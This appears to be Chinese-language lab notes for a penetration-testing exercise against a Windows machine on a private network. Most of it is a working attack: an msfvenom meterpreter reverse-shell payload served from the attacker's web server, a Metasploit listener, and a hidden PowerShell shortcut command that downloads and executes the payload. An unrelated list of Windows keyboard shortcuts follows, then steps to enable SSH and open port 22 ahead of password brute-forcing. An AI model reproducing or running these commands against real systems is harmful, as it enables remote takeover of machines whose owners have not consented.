环境搭建:
攻击机ip:192.168.75.131
靶机ip:192.168.75.129
使用 kali msfvenom 生成一个反弹shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.75.131 LPORT=5656 -f psh-reflection>/var/www/html/hack.ps1
查看是否生成
ls /var/www/html
启动 Apache 服务
service apache2 restart
service apache2 status
如图所示才运行成功
用kali中的火狐浏览器打开该文件,查看是否成功
http://192.168.75.131/hack.ps1
启动 msf
msfconsole
使用监听模块multi/handler
use exploit/multi/handler
指定 kali 攻击机 IP
set LHOST 192.168.75.131
设置端口
set LPORT 5656
设置返回载荷
set payload windows/x64/meterpreter/reverse_tcp
打开靶机桌面右键创建快捷方式在位置中输入下方命令
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.75.131/hack.ps1');test.ps1"
然后返回攻击机kali继续上方返回载荷命令输入
run
然后双击等kail进行反馈
如图所示即为成功然后进一步获取shell进行后续命令行指令操作
win+E 打开文件管器
win+D 显示桌面
win+L 锁计算机
alt+F4 关闭当前程序
ctrl+shift+Esc 打开任务管理器(或者ctrl+alt+delete)
ctrl+F 在一个文本或者网页里面查找,相当实用(退出一般按ESC)
ctrl+A 选中所有文本
如果采用老师的教程需要继续下面步骤
-
安装和启用OpenSSH服务器:
在较新版本的Windows 10和Windows Server中,OpenSSH服务器可以作为可选功能进行安装。您可以通过PowerShell来安装它:powershell复制代码
Add-WindowsFeature OpenSSH-Server-FullInstall
安装完成后,您需要启动SSH服务并设置为开机自启:
powershell复制代码
Start-Service sshd
Set-Service -Name sshd -StartupType 'Automatic'
-
配置Windows防火墙:
如果您之前未配置防火墙以允许通过22端口的SSH连接,您可以使用netsh
命令行工具来添加一条规则:cmd复制代码
netsh advfirewall firewall add rule name="SSH Port 22" dir=in action=allow protocol=TCP localport=22
这将在Windows防火墙中允许进入的TCP连接至本地端口22。
-
检查SSH服务状态:
使用以下命令检查SSH服务是否正在运行:cmd复制代码
sc query sshd
或者,在PowerShell中:
powershell复制代码
Get-Service sshd
-
使用命令行进行SSH远程连接:
一旦SSH服务器运行并且端口22开放,您就可以使用命令行工具(如cmd或PowerShell)来进行SSH连接了。例如:cmd复制代码
ssh username@remote_host_ip
这里的
username
是您要登录的远程主机的用户名,remote_host_ip
是远程主机的IP地址。如果您需要指定非默认的SSH端口(比如不是22),则可以使用
-p
参数:cmd复制代码
ssh -p port_number username@remote_host_ip
将
port_number
替换为实际的SSH端口号。
请注意,这些步骤假设您已经具有足够的权限来安装和配置Windows功能,以及修改防火墙规则。此外,确保您的SSH服务器配置正确,并且远程主机上的SSH服务正在运行。
如果您在连接时遇到任何问题,检查SSH服务的日志文件通常是一个好方法,它们可以提供关于连接尝试的详细信息以及可能发生的任何错误。日志文件通常位于C:\Windows\System32\OpenSSH\logs
目录下。
需要先打开指定的ssh服务及端口然后再进行密码暴力破解等步骤